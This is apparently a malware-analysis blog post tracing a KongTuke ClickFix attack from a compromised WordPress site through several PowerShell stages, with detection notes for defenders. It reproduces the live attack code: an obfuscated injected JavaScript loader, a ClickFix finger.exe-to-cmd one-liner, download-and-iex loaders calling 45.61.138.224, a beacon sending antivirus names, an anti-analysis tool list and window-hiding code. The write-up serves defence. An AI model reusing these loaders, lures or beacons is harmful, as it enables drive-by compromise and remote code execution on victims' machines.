KongTuke: ClickFix on Steroids
KongTuke is a threat actor that has recently increased their usage of ClickFix and ClickFix-styled attacks. They’ve begun to utilize a branching infection path based on the domain status of an infected device. If the device is domain joined, it will receive a different payload from non-domain joined devices. As Huntress notes, this is likely to identify and target Active Directory environments (also go read that write up, it’s way better than this!).
Recently, I observed a KongTuke ClickFix incident stemming from a compromised WordPress domain. Much like the Huntress write up, this incident utilized the domain checking capabilities recently observed in KongTuke attacks. For this incident, I followed the workgroup path instead of the domain joined path.
Compromised WordPress Domain
The initial compromised domain belongs to Kenco, a company that “… supplies the construction industry with a wide selection of attachments to make excavator, wheel loader, dozer and backhoe machines more productive and profitable.”. This domain was accessed by a user via a promotional email that was sent to their business email.
The domain was injected with an async script loading 6j6s.js from wilknnson.com. The contents of which are below.
6j6s.js
// 6j6s.js as served from wilknnson.com (javascript-obfuscator style output). The _0x24e1 string table is
// rotated by the self-invoking block at the top until a checksum matches, so literal indices are off by two
// from the table order; resolving them gives the following behaviour:
//  - runs once per browser: exits if the 'isCompleted' cookie exists, otherwise sets it for 4 days
//    (days*24*60*60*1000 in setCookie) -- a repeat visit from the same browser is not re-served the lure
//  - GETs https://www.cloudflare.com/cdn-cgi/trace and parses its key=value lines for 'ip' and 'loc'
//  - fingerprints the browser (Opera/OPR, Edg, Chrome, Safari, Firefox, MSIE/documentMode) and the OS
//    (macos, ios, windows, android, linux) from navigator.userAgent
//  - requests https://wilknnson.com/js.php?device=<os>&ip=&refferer=&browser=&ua=&domain=&loc=&is_ajax=1 with
//    each value base64-encoded via btoa(), then document.write()s the response when it is at least 35
//    characters long; shorter responses are only logged as 'Jquery.js is loaded'
// Defender note: the lure is chosen server-side from the IP/geo/UA data, so a replay from a sandbox may get
// an empty body; the cookie name, the trace call and the js.php query shape are usable proxy indicators.
var _0x48b1b3=_0x1c4a;function _0x1c4a(_0x2b3ab4,_0x16286d){_0x2b3ab4=_0x2b3ab4-0x1d2;var _0x24e15b=_0x24e1();var _0x1c4aaf=_0x24e15b[_0x2b3ab4];return _0x1c4aaf;}(function(_0x3386dc,_0x3b7391){var _0x25664e=_0x1c4a,_0x2947bd=_0x3386dc();while(!![]){try{var _0x5d8c28=-parseInt(_0x25664e(0x1f2))/0x1+-parseInt(_0x25664e(0x1d7))/0x2*(-parseInt(_0x25664e(0x200))/0x3)+-parseInt(_0x25664e(0x1f0))/0x4+parseInt(_0x25664e(0x1dc))/0x5*(-parseInt(_0x25664e(0x1ed))/0x6)+-parseInt(_0x25664e(0x1e9))/0x7*(-parseInt(_0x25664e(0x1da))/0x8)+-parseInt(_0x25664e(0x1d6))/0x9+parseInt(_0x25664e(0x1ec))/0xa;if(_0x5d8c28===_0x3b7391)break;else _0x2947bd['push'](_0x2947bd['shift']());}catch(_0x122a60){_0x2947bd['push'](_0x2947bd['shift']());}}}(_0x24e1,0x671e2));function setCookie(_0x5d3059,_0x32f3a2,_0x55938e){var _0x518d0c=_0x1c4a,_0x30137a='';if(_0x55938e){var _0x3295c7=new Date();_0x3295c7[_0x518d0c(0x1d5)](_0x3295c7[_0x518d0c(0x1df)]()+_0x55938e*0x18*0x3c*0x3c*0x3e8),_0x30137a=_0x518d0c(0x1fa)+_0x3295c7['toUTCString']();}document[_0x518d0c(0x1ea)]=_0x5d3059+'='+(_0x32f3a2||'')+_0x30137a+_0x518d0c(0x1e2);}function getCookie(_0x1bda7a){var _0x2c556a=_0x1c4a,_0x3b586f=_0x1bda7a+'=',_0x2517a0=document[_0x2c556a(0x1ea)][_0x2c556a(0x1db)](';');for(var _0x32140a=0x0;_0x32140a<_0x2517a0[_0x2c556a(0x1e0)];_0x32140a++){var _0x217a00=_0x2517a0[_0x32140a];while(_0x217a00[_0x2c556a(0x205)](0x0)=='\x20')_0x217a00=_0x217a00[_0x2c556a(0x201)](0x1,_0x217a00[_0x2c556a(0x1e0)]);if(_0x217a00[_0x2c556a(0x1d4)](_0x3b586f)==0x0)return _0x217a00[_0x2c556a(0x201)](_0x3b586f[_0x2c556a(0x1e0)],_0x217a00[_0x2c556a(0x1e0)]);}return null;}function eraseCookie(_0x3129de){var _0x5bce45=_0x1c4a;document['cookie']=_0x3129de+_0x5bce45(0x1dd);}if(getCookie(_0x48b1b3(0x1e5))===null){setCookie('isCompleted',!![],0x4);var HttpClient=function(){var _0x406129=_0x48b1b3;this[_0x406129(0x203)]=function(_0x2a0716,_0x127250){var _0x26fe14=_0x406129,_0x575a34=new XMLHttpRequest();_0x575a34['onreadystatechange']=function(){var 
_0x3e0535=_0x1c4a;if(_0x575a34[_0x3e0535(0x1fb)]==0x4&&_0x575a34['status']==0xc8)_0x127250(_0x575a34[_0x3e0535(0x1f7)]);},_0x575a34['open'](_0x26fe14(0x1d2),_0x2a0716,!![]),_0x575a34[_0x26fe14(0x1e6)](null);};},client=new HttpClient();client['get']('https://www.cloudflare.com/cdn-cgi/trace',function(_0x38719f){var _0x1b2772=_0x48b1b3;_0x38719f=_0x38719f[_0x1b2772(0x1f9)]()[_0x1b2772(0x1db)]('\x0a')[_0x1b2772(0x1f4)](function(_0x2f41e6,_0x4991fa){return _0x4991fa=_0x4991fa['split']('='),(_0x2f41e6[_0x4991fa[0x0]]=_0x4991fa[0x1],_0x2f41e6);},{});function _0x5e5a8d(){var _0x39be10=_0x1b2772,_0x7cc949=null;if((navigator[_0x39be10(0x1e8)][_0x39be10(0x1d4)](_0x39be10(0x1f6))||navigator['userAgent'][_0x39be10(0x1d4)](_0x39be10(0x1fe)))!=-0x1)_0x7cc949=_0x39be10(0x206);else{if(navigator[_0x39be10(0x1e8)][_0x39be10(0x1d4)]('Edg')!=-0x1)_0x7cc949=_0x39be10(0x1f5);else{if(navigator[_0x39be10(0x1e8)][_0x39be10(0x1d4)]('Chrome')!=-0x1)_0x7cc949=_0x39be10(0x1d8);else{if(navigator[_0x39be10(0x1e8)][_0x39be10(0x1d4)]('Safari')!=-0x1)_0x7cc949=_0x39be10(0x208);else{if(navigator[_0x39be10(0x1e8)]['indexOf']('Firefox')!=-0x1)_0x7cc949=_0x39be10(0x204);else navigator[_0x39be10(0x1e8)]['indexOf'](_0x39be10(0x1de))!=-0x1||!!document[_0x39be10(0x1ff)]==!![]?_0x7cc949='IE':_0x7cc949='Unknown';}}}}return _0x7cc949;}function _0x50a856(){var _0x2c7254=_0x1b2772;let _0x21b04a=window['navigator']['userAgent'][_0x2c7254(0x1d9)](),_0x5d753b=/(macintosh|macintel|macppc|mac68k|macos)/i,_0x1d6fa2=/(win32|win64|windows|wince)/i,_0x3fd23b=/(iphone|ipad|ipod)/i,_0x2f8ccd=null;if(_0x5d753b[_0x2c7254(0x209)](_0x21b04a))_0x2f8ccd='macos';else{if(_0x3fd23b[_0x2c7254(0x209)](_0x21b04a))_0x2f8ccd=_0x2c7254(0x1fd);else{if(_0x1d6fa2[_0x2c7254(0x209)](_0x21b04a))_0x2f8ccd='windows';else{if(/android/[_0x2c7254(0x209)](_0x21b04a))_0x2f8ccd='android';else!_0x2f8ccd&&/linux/['test'](_0x21b04a)&&(_0x2f8ccd=_0x2c7254(0x1e7));}}}return _0x2f8ccd;}var _0x3a66bf=_0x50a856(),_0x5b7a7e=_0x5e5a8d();if(!![]){var 
_0x4bdb62=window['location'][_0x1b2772(0x202)],_0x103212=window[_0x1b2772(0x1f8)][_0x1b2772(0x1e8)][_0x1b2772(0x1d9)](),_0x16b0af='https://wilknnson.com',_0x38e8d1=_0x16b0af+_0x1b2772(0x1e4)+_0x3a66bf+_0x1b2772(0x207)+btoa(_0x38719f['ip'])+_0x1b2772(0x1fc)+btoa(_0x4bdb62)+_0x1b2772(0x1ef)+btoa(_0x5b7a7e)+'&ua='+btoa(_0x103212)+_0x1b2772(0x1e1)+btoa(_0x16b0af)+_0x1b2772(0x1d3)+btoa(_0x38719f['loc'])+_0x1b2772(0x1ee),_0x1a13a4=new XMLHttpRequest();_0x1a13a4['onreadystatechange']=function(){var _0x199080=_0x1b2772;if(_0x1a13a4[_0x199080(0x1fb)]==XMLHttpRequest['DONE']){var _0xb569ef=_0x1a13a4[_0x199080(0x1f7)];console[_0x199080(0x1f3)](_0xb569ef),_0xb569ef[_0x199080(0x1e0)]<0x23?console[_0x199080(0x1f3)](_0x199080(0x1eb)):document[_0x199080(0x1e3)](_0x1a13a4[_0x199080(0x1f7)]);}},_0x1a13a4[_0x1b2772(0x1f1)]('GET',_0x38e8d1,!![]),_0x1a13a4[_0x1b2772(0x1e6)](null);}});}function _0x24e1(){var _0x232a31=['Safari','test','GET','&loc=','indexOf','setTime','4116852BfbJyH','793472yVYsHY','Chrome','toLowerCase','32AcNIEK','split','593555uWTXlt','=;\x20Path=/;\x20Expires=Thu,\x2001\x20Jan\x201970\x2000:00:01\x20GMT;','MSIE','getTime','length','&domain=',';\x20path=/','write','/js.php?device=','isCompleted','send','linux','userAgent','1253378DiazRY','cookie','Jquery.js\x20is\x20loaded','6663300pXwbEf','42pparah','&is_ajax=1','&browser=','147456jGLEYh','open','31643WNNSda','log','reduce','Edge','Opera','responseText','navigator','trim',';\x20expires=','readyState','&refferer=','ios','OPR','documentMode','3MShqDi','substring','href','get','Firefox','charAt','opera','&ip='];_0x24e1=function(){return _0x232a31;};return _0x24e1();}
In typical ClickFix fashion, this script detects the device type and loads an appropriate lure.
Infection Chain
This incident follows a Windows attack chain.
ClickFix Command
The lure copies a finger.exe command to the clipboard and asks the user to execute it via Windows Key + R.
The command is:
REM ClickFix one-liner pasted into Win+R. Copies the built-in finger.exe to %temp%\ct.exe (same binary, new
REM name and path), uses the copy to query the attacker's host (the user@host target is shown redacted as
REM [email protected] in this copy), and pipes whatever the server returns straight into cmd for execution.
REM start "" /min keeps the window minimised so the user sees little.
REM Detection: finger.exe copied out of system32, a ct.exe in %temp% making outbound TCP/79, and cmd.exe
REM started with its input piped from that process.
cmd /c start "" /min cmd /c "copy %windir%\system32\finger.exe %temp%\ct.exe&%temp%\ct.exe [email protected]|cmd"
Captcha ID: 1ef45r
This command creates a copy of the finger utility in the %temp% directory. This copy is called ct.exe and is used to query the remote server at [email protected]. Once queried, the response is piped to CMD for execution.
Stage One
The finger command pulls byte-encoded PowerShell code. This code uses a common obfuscation method, char-array obfuscation: human-readable code is stored as an array of character codes and is dynamically converted back into a char array for execution.
# Stage one as returned over finger: the whole script is an array of decimal character codes that -join
# [char[]] turns back into text before iex runs it (the decoded text is shown below). -ep bypass disables
# the execution policy for this process. Script block logging (Event ID 4104) records the decoded text,
# which is the easier place to detect this than the command line.
powershell.exe -ep bypass -c iex (-join [char[]]@(10,32,32,32,32,73,110,118,111,107,101,45,87,101,98,82,101,113,117,101,115,116,32,45,85,114,105,32,36,40,45,106,111,105,110,40,39,110,122,122,118,58,47,47,52,53,46,54,49,46,49,51,56,46,50,50,52,47,104,39,46,84,111,67,104,97,114,65,114,114,97,121,40,41,124,37,123,91,105,110,116,93,36,99,61,36,95,59,105,102,40,36,99,45,103,101,54,53,45,97,110,100,36,99,45,108,101,57,48,41,123,91,99,104,97,114,93,40,54,53,43,40,40,36,99,45,54,53,43,50,48,41,37,50,54,41,41,125,101,108,115,101,105,102,40,36,99,45,103,101,57,55,45,97,110,100,36,99,45,108,101,49,50,50,41,123,91,99,104,97,114,93,40,57,55,43,40,40,36,99,45,57,55,43,50,48,41,37,50,54,41,41,125,101,108,115,101,123,91,99,104,97,114,93,36,99,125,125,41,41,32,45,79,117,116,70,105,108,101,32,40,91,73,79,46,80,97,116,104,93,58,58,67,111,109,98,105,110,101,40,91,69,110,118,105,114,111,110,109,101,110,116,93,58,58,71,101,116,70,111,108,100,101,114,80,97,116,104,40,36,40,45,106,111,105,110,40,39,82,103,103,99,122,116,114,107,122,102,101,85,114,107,114,39,46,84,111,67,104,97,114,65,114,114,97,121,40,41,124,37,123,91,105,110,116,93,36,99,61,36,95,59,105,102,40,36,99,45,103,101,54,53,45,97,110,100,36,99,45,108,101,57,48,41,123,91,99,104,97,114,93,40,54,53,43,40,40,36,99,45,54,53,43,57,41,37,50,54,41,41,125,101,108,115,101,105,102,40,36,99,45,103,101,57,55,45,97,110,100,36,99,45,108,101,49,50,50,41,123,91,99,104,97,114,93,40,57,55,43,40,40,36,99,45,57,55,43,57,41,37,50,54,41,41,125,101,108,115,101,123,91,99,104,97,114,93,36,99,125,125,41,41,41,44,32,36,40,45,106,111,105,110,40,39,113,97,112,103,110,114,46,110,113,49,39,46,84,111,67,104,97,114,65,114,114,97,121,40,41,124,37,123,91,105,110,116,93,36,99,61,36,95,59,105,102,40,36,99,45,103,101,54,53,45,97,110,100,36,99,45,108,101,57,48,41,123,91,99,104,97,114,93,40,54,53,43,40,40,36,99,45,54,53,43,50,41,37,50,54,41,41,125,101,108,115,101,105,102,40,36,99,45,103,101,57,55,45,97,110,100,36,99,45,108,101,49,50,50,41,123,91,99,104,97,114,93,40,57,5
5,43,40,40,36,99,45,57,55,43,50,41,37,50,54,41,41,125,101,108,115,101,123,91,99,104,97,114,93,36,99,125,125,41,41,41,41,59,10,38,32,40,91,73,79,46,80,97,116,104,93,58,58,67,111,109,98,105,110,101,40,91,69,110,118,105,114,111,110,109,101,110,116,93,58,58,71,101,116,70,111,108,100,101,114,80,97,116,104,40,36,40,45,106,111,105,110,40,39,77,98,98,120,117,111,109,102,117,97,122,80,109,102,109,39,46,84,111,67,104,97,114,65,114,114,97,121,40,41,124,37,123,91,105,110,116,93,36,99,61,36,95,59,105,102,40,36,99,45,103,101,54,53,45,97,110,100,36,99,45,108,101,57,48,41,123,91,99,104,97,114,93,40,54,53,43,40,40,36,99,45,54,53,43,49,52,41,37,50,54,41,41,125,101,108,115,101,105,102,40,36,99,45,103,101,57,55,45,97,110,100,36,99,45,108,101,49,50,50,41,123,91,99,104,97,114,93,40,57,55,43,40,40,36,99,45,57,55,43,49,52,41,37,50,54,41,41,125,101,108,115,101,123,91,99,104,97,114,93,36,99,125,125,41,41,41,44,32,36,40,45,106,111,105,110,40,39,108,118,107,98,105,109,46,105,108,49,39,46,84,111,67,104,97,114,65,114,114,97,121,40,41,124,37,123,91,105,110,116,93,36,99,61,36,95,59,105,102,40,36,99,45,103,101,54,53,45,97,110,100,36,99,45,108,101,57,48,41,123,91,99,104,97,114,93,40,54,53,43,40,40,36,99,45,54,53,43,55,41,37,50,54,41,41,125,101,108,115,101,105,102,40,36,99,45,103,101,57,55,45,97,110,100,36,99,45,108,101,49,50,50,41,123,91,99,104,97,114,93,40,57,55,43,40,40,36,99,45,57,55,43,55,41,37,50,54,41,41,125,101,108,115,101,123,91,99,104,97,114,93,36,99,125,125,41,41,41,41,59,10,82,101,109,111,118,101,45,73,116,101,109,32,40,91,73,79,46,80,97,116,104,93,58,58,67,111,109,98,105,110,101,40,91,69,110,118,105,114,111,110,109,101,110,116,93,58,58,71,101,116,70,111,108,100,101,114,80,97,116,104,40,36,40,45,106,111,105,110,40,39,88,109,109,105,102,122,120,113,102,108,107,65,120,113,120,39,46,84,111,67,104,97,114,65,114,114,97,121,40,41,124,37,123,91,105,110,116,93,36,99,61,36,95,59,105,102,40,36,99,45,103,101,54,53,45,97,110,100,36,99,45,108,101,57,48,41,123,91,99,104,97,114,93,40,54,53,43,40,40,36,9
9,45,54,53,43,51,41,37,50,54,41,41,125,101,108,115,101,105,102,40,36,99,45,103,101,57,55,45,97,110,100,36,99,45,108,101,49,50,50,41,123,91,99,104,97,114,93,40,57,55,43,40,40,36,99,45,57,55,43,51,41,37,50,54,41,41,125,101,108,115,101,123,91,99,104,97,114,93,36,99,125,125,41,41,41,44,32,36,40,45,106,111,105,110,40,39,98,108,97,114,121,99,46,121,98,49,39,46,84,111,67,104,97,114,65,114,114,97,121,40,41,124,37,123,91,105,110,116,93,36,99,61,36,95,59,105,102,40,36,99,45,103,101,54,53,45,97,110,100,36,99,45,108,101,57,48,41,123,91,99,104,97,114,93,40,54,53,43,40,40,36,99,45,54,53,43,49,55,41,37,50,54,41,41,125,101,108,115,101,105,102,40,36,99,45,103,101,57,55,45,97,110,100,36,99,45,108,101,49,50,50,41,123,91,99,104,97,114,93,40,57,55,43,40,40,36,99,45,57,55,43,49,55,41,37,50,54,41,41,125,101,108,115,101,123,91,99,104,97,114,93,36,99,125,125,41,41,41,41,59,10,10,32,32,32,32))
Decoded, this script uses further obfuscation methods to hide the domain it’s pulling code from. It retrieves a PowerShell payload and executes it.
# Stage one, decoded. Each -join('...'.ToCharArray()|%{...}) block is a rotation (Caesar) cipher: letters are
# shifted by the constant in ($c-65+N)%26 / ($c-97+N)%26, every other character passes through unchanged.
# Working the shifts out by hand:
#   'nzzv://45.61.138.224/h'  (+20)                                  -> http://45.61.138.224/h
#   'RggcztrkzfeUrkr' (+9), 'MbbxuomfuazPmfm' (+14), 'XmmifzxqflkAxqx' (+3) -> ApplicationData  (%APPDATA%)
#   'qapgnr.nq1' (+2), 'lvkbim.il1' (+7), 'blaryc.yb1' (+17)          -> script.ps1
# Net effect: download the next stage to %APPDATA%\script.ps1, run it, delete it. Each of the three
# statements uses a different shift so no two encoded strings look alike.
# Defender note: the on-disk artifact lives only for the duration of the run -- look for script.ps1
# create/delete in %APPDATA%, script block logs containing the ToCharArray()|%{[int]$c=$_ pattern, and
# HTTP to 45.61.138.224.
Invoke-WebRequest -Uri $(-join('nzzv://45.61.138.224/h'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+20)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+20)%26))}else{[char]$c}})) -OutFile ([IO.Path]::Combine([Environment]::GetFolderPath($(-join('RggcztrkzfeUrkr'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+9)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+9)%26))}else{[char]$c}}))), $(-join('qapgnr.nq1'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+2)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+2)%26))}else{[char]$c}}))));
# & <%APPDATA%\script.ps1>  -- executes the downloaded stage
& ([IO.Path]::Combine([Environment]::GetFolderPath($(-join('MbbxuomfuazPmfm'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+14)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+14)%26))}else{[char]$c}}))), $(-join('lvkbim.il1'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+7)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+7)%26))}else{[char]$c}}))));
# Remove-Item <%APPDATA%\script.ps1>  -- cleans up the artifact
Remove-Item ([IO.Path]::Combine([Environment]::GetFolderPath($(-join('XmmifzxqflkAxqx'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+3)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+3)%26))}else{[char]$c}}))), $(-join('blaryc.yb1'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+17)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+17)%26))}else{[char]$c}}))));
Stage Two
The script pulled from the PowerShell loader contains a BXOR’d base64 array. Annoyingly enough, when decoded, this base64 array is another base64 encoded script. I had to reverse the same format five times before I got the actual payload. Security through obscurity I guess.
# Stage two wrapper (the write-up says this exact shape is nested five deep). Only $eqqvTW (the base64
# blob, redacted here) and $ziqftT (the single-byte XOR key) are used; the other four integers are never
# referenced in this snippet -- presumably filler to vary the file.
$esWBdQ = 8470
$myWtWT = 9494
$Orkufq = 9816
$KJwada = 7066
$eqqvTW = "<base64>"
$ziqftT = 231
# Decode helper: base64 -> bytes, XOR every byte with 231, then read the result as UTF-8 text.
# Declared global: so the name is visible outside the script scope.
function global:YMmXLQ {
$erxGVv = [System.Convert]::FromBase64String($eqqvTW)
$SBmmIl = @()
# byte-wise XOR with the fixed key; the += on an array makes this O(n^2) but the input is small
foreach ($b in $erxGVv) {
$SBmmIl += ($b -bxor $ziqftT)
}
$XAVPdi = [System.Text.Encoding]::UTF8.GetString($SBmmIl)
return $XAVPdi
}
$VwIImY = YMmXLQ
# 'iex' is assembled from three one-character strings so the literal never appears in the file
$dmEJwu = 'i' + 'e' + 'x'
# Invoke-Expression on the decoded text -- the next wrapper (or the real payload) runs here
& $dmEJwu $VwIImY
I won’t post all five stages, but it really was decoding the same thing 5 times 💀
On the fifth base64 decode, the actual payload was revealed. This performs checks for various analysis processes. It also contains the code used to check the domain status of the device. Depending on the status of the device, a different POST body is sent off to the C2. Regardless of status, this body includes the AntiVirusProduct name.
Note: I followed the WORKGROUP non-domain path.
# Stage two, innermost payload: analysis-tool check, domain-membership check, then a beacon whose response
# is executed directly.
# Substrings matched against every running process name (case-folded below). Note the mix of debuggers,
# sniffers, sandbox/VM tooling and the VMware/VirtualBox guest services.
$m = @(
"wireshark", "processhacker", "fiddler", "procexp",
"procmon", "sysmon", "ida", "x32dbg", "x64dbg", "ollydbg", "cheatengine",
"scylla", "scylla_x64", "scylla_x86", "immunitydebugger", "windbg",
"reshacker", "reshacker32", "reshacker64", "hxd", "ghidra", "lordpe",
"tcpview", "netmon", "sniffer", "snort", "apimonitor", "radare2", "procdump",
"dbgview", "de4dot", "detectiteasy", "detectit_easy", "dumpcap", "netcat",
"bintext", "dependencywalker", "dependencies", "prodiscover", "sysinternals",
"netlimiter", "sandboxie", "vmware", "virtualbox", "vmtools", "VMwareService", "VMwareTray", "VBoxService", "VBoxTray",
"qemu-ga", "prl_cc"
)
# -like "*$tool*" is a substring match, so short entries such as "ida" can also hit unrelated names.
# On any hit the script prints "***" and exit terminates the whole PowerShell process -- a cheap way to
# make the sample do nothing inside a monitored analysis box.
Get-Process | ForEach-Object {
$processName = $_.Name.ToLower()
foreach ($tool in $m) {
if ($processName -like "*$tool*") {
Write-Host "***"
exit
}
}
}
# Domain check: grep the "Domain:" line out of systeminfo and strip the label. This relies on the English
# label; on a localised Windows the match would likely fail and $domain would not equal 'WORKGROUP'
# (not verified here).
$systemInfo = systeminfo | findstr /C:"Domain"
$domain = $systemInfo -replace ".*Domain:\s*"
# Both branches POST the installed AV product names (SecurityCenter2 AntivirusProduct) to /n; only the
# prefix differs: "ABCD111" for a WORKGROUP host, "BCDA222" for a domain-joined one, which lets the server
# hand out different next stages. The HTTP response body is piped straight into iex.
if ($domain -eq 'WORKGROUP') {
iwr 'http://45.61.138.224/n' `
-Method POST `
-Body @{
message = "ABCD111`n$(
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct |
Select-Object -ExpandProperty DisplayName |
Out-String
)"
} `
-ContentType 'application/x-www-form-urlencoded' `
-UseBasicParsing | iex
}
else {
iwr 'http://45.61.138.224/n' `
-Method POST `
-Body @{
message = "BCDA222`n$(
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct |
Select-Object -ExpandProperty DisplayName |
Out-String
)"
} `
-ContentType 'application/x-www-form-urlencoded' `
-UseBasicParsing | iex
}
Stage Three
The POST request should look something like this:
# Analyst reproduction of the stage-two beacon: same endpoint, method, content type and form body as the
# malware, but the response is written to a file (-OutFile) instead of being piped into iex, so the next
# stage can be inspected without running it. "ABCD111" is the WORKGROUP marker; a domain-joined host
# would send "BCDA222" and may receive a different payload.
iwr "http://45.61.138.224/n" -Method POST -Body @{message = "ABCD111`nWindows Defender"} -ContentType 'application/x-www-form-urlencoded' -OutFile workgroup_response -Verbose
The response to the POST included code that built a curl request from an encoded array.
# Stage three, as returned by the POST. Everything here builds and runs:  iex (curl -useb <url>)
$rivflc='ur' ;
# alias jueipa2a -> 'c' + 'ur' + 'l' = curl, the Windows PowerShell alias for Invoke-WebRequest
set-alias jueipa2a c$($rivflc)l;
# the URL as character codes, each offset by 7673 (decoded by the helper below)
$dnhatiwgpbfvlq=(7777,7789,7789,7785,7731,7720,7720,7788,7794,7795,7791,7723,7722,7773,7719,7789,7784,7785,7720,7722,7719,7785,7777,7785,7736,7788,7734,7727,7724,7774,7730,7726,7771,7774,7722,7718,7730,7723,7774,7721,7718,7725,7726,7772,7722,7718,7770,7730,7723,7729,7718,7727,7726,7773,7727,7724,7771,7722,7728,7772,7773,7722,7772);
# never used -- decoy
$cdxbmtwslz=('reicporet','get-cmdlet');
$yftxulj=$dnhatiwgpbfvlq;
# subtract the offset from each element and append the resulting char; the chain of copies
# ($hjklmu, $kogrsv, $iwbmvnlsgc, $tyackidmsbf) is noise, only $tyackidmsbf is read afterwards
foreach($gqjdfh in $yftxulj){$hjklmu=$gqjdfh;
$kogrsv=$kogrsv+[char]($hjklmu-7673);
$iwbmvnlsgc=$kogrsv;
$tyackidmsbf=$iwbmvnlsgc};
# $wspmkirhvuq is not defined anywhere in this snippet -- more filler
$wspmkirhvuq[2]=$tyackidmsbf;
$oavhksw='rl';
$qzrkbwdahsipj=1;
# [char]((200+30)-(100+25)) = [char]105 = 'i', so this dot-invokes iex on the fetched body
# (-useb = -UseBasicParsing)
.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(jueipa2a -useb $tyackidmsbf)
To decode this, you can simply execute the array operation and print out the result.
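# Analyst helper: every element of $array is a character code offset by $offset; subtracting the offset and
# joining the characters recovers the stage-three URL. The original loop left $char_array uninitialised,
# carried the value through three redundant variables and never emitted the result; this version keeps the
# same $array/$char_array/$finchar_array names, uses a pipeline instead of string += in a loop, and prints
# the decoded string at the end.
$array=(7777,7789,7789,7785,7731,7720,7720,7788,7794,7795,7791,7723,7722,7773,7719,7789,7784,7785,7720,7722,7719,7785,7777,7785,7736,7788,7734,7727,7724,7774,7730,7726,7771,7774,7722,7718,7730,7723,7774,7721,7718,7725,7726,7772,7722,7718,7770,7730,7723,7729,7718,7727,7726,7773,7727,7724,7771,7722,7728,7772,7773,7722,7772);
# offset used by this sample; other samples of the same loader may use a different constant
$offset = 7673
$char_array = -join ($array | ForEach-Object { [char]($_ - $offset) })
$finchar_array = $char_array
# emit the decoded URL (defang before sharing)
$finchar_array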
# Domain: hxxp[://]syzv21d[.]top/1.php?s=63e95be1-92e0-45c1-a928-65d63b17cd1c
The retrieved payload is executed via Invoke-Expression.
Stage Four
This stage introduces more heavily obfuscated code. I’ve included a snippet of the payload below, to highlight some of the techniques used. Essentially, this payload uses a domain generation algorithm (DGA) to pull some code via the base64 encoded command. It also does an AMSI patch and takes an encoded string, decodes it, and executes. See the Huntress write up for better details on this. It’s nifty.
I really like the very annoying char operations they use to obfuscate everything. Unfortunately, they use this for everything after this point. It’s only fun the first time, after that it just becomes annoying.
# Stage four, setup. Hides the host console: declares user32!ShowWindowAsync via Add-Type, gives the
# current window a fresh GUID title so it can locate its own process by MainWindowTitle, then calls
# ShowWindowAsync(handle, 0) -- 0 is SW_HIDE.
$rea = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);';$proa = Add-Type -MemberDefinition $rea -name 'Win32ShowWindowAsync' -namespace 'Win32Functions' -PassThru;$wt = New-Guid;$Host.UI.RawUI.WindowTitle = $wt;$Pr = (Get-Process | Where-Object { $_.MainWindowTitle -eq $wt });$proa::ShowWindowAsync($Pr.'MainWindowHandle', 0)
# Second, hidden PowerShell with an encoded command (the DGA script shown further down). Process-creation
# telemetry for powershell.exe -e with -windowstyle hidden from a PowerShell parent is the detection point.
start-process "powershell" -args "-e <base64>" -windowstyle hidden;
# Keeps a reference to $ExecutionContext (presumably to reach members through it later, as stage five does)
# and builds a 3-character string from integer arithmetic; neither is used in this excerpt.
$mzekndqoyp=$executioncontext;$edesalisinanaroresesonoron = ([cHAR[]]@((452864/(25985024/(12184-5528))),(7352-(4397+2886)),(391080/(308+2951))) -join '');
# Decoder for the "<encoded string>" argument; the author's readable rewrite (function decode) follows
# later. Every member and type name is built from integer arithmetic at run time and only exists as a
# string while the call executes, which is what defeats static string matching. Decoded names per line
# are taken from the author's rewrite.
function c27y3zjqxphs08nor6mua5fbg9w {param($7edv853olgxh6p1 )
# reflection call on [System.Convert]: GetMethod(<name>).Invoke($null, @($arg)); read as FromBase64String,
# yielding the raw byte[]
$d6frko18xgy0pac = [System.Convert].((-join (@((-1775+(-6567+(84197304/10008))),(1126-1025),(408552/(9450-5928)),(727034/9442),(587719/(9041-(8786-(-1705+(57316065/7885))))),(10353-10237),(1043120/(13363-(9630-(3485+(6594-3782))))),(-6688+(10350-3551)),(397300/3973))| ForEach-Object { [char]$_ })))((-join (@((315770/4511),(1061796/9314),(750249/(11704-4945)),(396869/(6921541/(8195211/4311))),(-1858+(16888872/8778)),(849720/(7479+1281)),(7484-(12217802/(148+(7098510/4701)))),(750228/(1983276/(724905/(3209-(10667-(82635279/(20266885/(2391+(825240/(4496+3439)))))))))),(-6784+(225+6613)),(-2300+2352),(-10080+(23791583/2341)),(-7124+7240),(8607-(15613-(13808-6688))),(7120-7015),(6908-(1407+5391)),(8232-8129))| ForEach-Object { [char]$_ }))).((-join (@((259515/(103+(25137464/(12346-5064)))),(-1521+1631),(941994/(12233-4250)),(-4292+(1495+2908)),(763231/(-2255+(212+(19386-(3579+(3330+3301)))))),(-5159+5260))| ForEach-Object { [char]$_ })))($null, @($7edv853olgxh6p1))
# $3ncfms07brjety6 is not defined in this excerpt; per the author's rewrite it is
# [System.Text.Encoding]::ascii and the member is GetBytes, so this is the XOR key: the bytes of "xiquayg9wo0c"
$0rgifljwdktcpsh= $3ncfms07brjety6.(([char[]]@((707870/(97775790/9807)),(3336-(1986290/(1573682/2563))),(-305+421),(587598/(87142564/(6944+2844))),(642026/(1165+(35169513/8493))),(7091-6975),(4731-4630),(9752-9637)) -join ''))("xiquayg9wo0c")
$cdj7kh3y9t4p12o = $d6frko18xgy0pac
